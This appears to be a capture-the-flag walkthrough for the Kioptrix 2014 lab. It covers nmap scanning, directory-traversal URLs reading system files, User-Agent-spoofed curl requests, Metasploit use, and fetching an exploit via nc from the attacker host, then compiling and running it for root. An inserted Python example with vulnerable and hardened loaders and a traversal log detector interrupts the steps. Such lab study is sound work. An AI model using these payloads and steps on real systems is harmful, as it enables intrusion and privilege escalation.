Target: Kioptrix 2014 (#5)
Attacking machine: Kali (192.168.1.107)
Gateway: 192.168.1.255
#1 Port scanning
nmap 192.168.1.159 -O -sV -sS
-O  OS detection
-sV probe the open ports for service and version information
-sS use a SYN scan
#2 Visit ports 80 and 8080
View the page source.
Visit
http://192.168.1.159/pChart2.1.3/examples/index.php
Look for the Navigation vulnerability.
A directory traversal vulnerability exists:
http://192.168.1.159/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
Since the server is Apache, try reading the Apache configuration.
TIP1: https://cwiki.apache.org/confluence/display/HTTPD/DistrosDefaultLayout
/usr/local/etc/apache22/httpd.conf
Port 8080 only answers requests that carry a specific User-Agent:
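The traversal above works because the Script parameter is joined onto the examples directory with no containment check. The following is an added example, not code from the Kioptrix VM or from pChart: it shows the bug class in a minimal loader, a hardened loader that resolves the path and refuses anything outside its base directory, and a check that flags traversal attempts in Apache access-log lines. The function names, the temporary directory layout and the log lines are constructed for illustration.

```python
"""Directory traversal: vulnerable loader, hardened loader, and an access-log check.

Added example; not part of the original writeup, the Kioptrix VM or pChart.
All names, paths and log lines below are constructed for illustration.
"""
import os
import re
import tempfile
from urllib.parse import unquote


def vulnerable_view(base_dir: str, script: str) -> str:
    """Mirrors the bug class: the user-supplied name is joined to the examples
    directory without any containment check, so '..' sequences escape it."""
    path = os.path.join(base_dir, unquote(script))
    with open(path) as fh:
        return fh.read()


def safe_view(base_dir: str, script: str) -> str:
    """Hardened loader: decode, resolve to a canonical absolute path, and refuse
    any target that does not stay inside base_dir."""
    root = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(root, unquote(script)))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"path escapes {root}: {script!r}")
    with open(target) as fh:
        return fh.read()


def build_demo_tree():
    """Constructed layout: <tmp>/examples/index.txt (allowed) and <tmp>/secret.txt
    (outside the examples directory). Returns (examples_dir, traversal_payload)."""
    tmp = tempfile.mkdtemp(prefix="traversal-demo-")
    examples = os.path.join(tmp, "examples")
    os.mkdir(examples)
    with open(os.path.join(examples, "index.txt"), "w") as fh:
        fh.write("hello\n")
    with open(os.path.join(tmp, "secret.txt"), "w") as fh:
        fh.write("top secret\n")
    return examples, "..%2fsecret.txt"  # URL-encoded '../secret.txt'


# '..' followed by '/', '\\' or their URL-encoded forms, plus encoded '..' itself.
TRAVERSAL = re.compile(r"\.\.(/|\\|%2f|%5c)|%2e%2e", re.IGNORECASE)

# Apache combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed access-log lines (not captured from the VM); the second and third
# carry traversal payloads against the pChart examples index.
SAMPLE_LOG = """\
192.168.1.107 - - [10/Oct/2023:12:00:01 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.drawBarChart.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.107 - - [10/Oct/2023:12:00:07 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1340 "-" "Mozilla/5.0"
192.168.1.107 - - [10/Oct/2023:12:00:09 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=..%2F..%2F..%2Fusr/local/etc/apache22/httpd.conf HTTP/1.1" 200 9800 "-" "curl/7.88"
"""


def find_traversal(log_text: str) -> list:
    """Return the parsed requests whose URL contains a traversal sequence,
    checking both the raw and the once-decoded URL so encoding does not hide it."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = m.group("url")
        if TRAVERSAL.search(url) or TRAVERSAL.search(unquote(url)):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "url": url, "status": m.group("status")})
    return hits


if __name__ == "__main__":
    examples_dir, payload = build_demo_tree()
    print("vulnerable loader returned:", vulnerable_view(examples_dir, payload).strip())
    try:
        safe_view(examples_dir, payload)
    except PermissionError as exc:
        print("hardened loader refused:", exc)
    for hit in find_traversal(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['ts']} status={hit['status']} {hit['url']}")
```

A hit with status 200 is the one to act on: the traversal was not only attempted but served. The path check relies on realpath so that symlinks inside the base directory cannot be used to point outside it.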
curl -H "User-Agent:Mozilla/4.0" http://192.168.1.159:8080
curl -H "User-Agent:Mozilla/4.0" http://192.168.1.159:8080/phptax
Use msf (Metasploit).
#3 Privilege escalation
Find an exploit.
wget https://www.exploit-db.com/download/28718
Sender (attacking machine):
nc -lvp 6666 < 28718
Receiver (target):
cd /tmp && nc -nv 192.168.1.107 6666 > exploit.c
gcc exploit.c
./a.out
cd /root
ls -al
chmod 777 congrats.txt
cat congrats.txt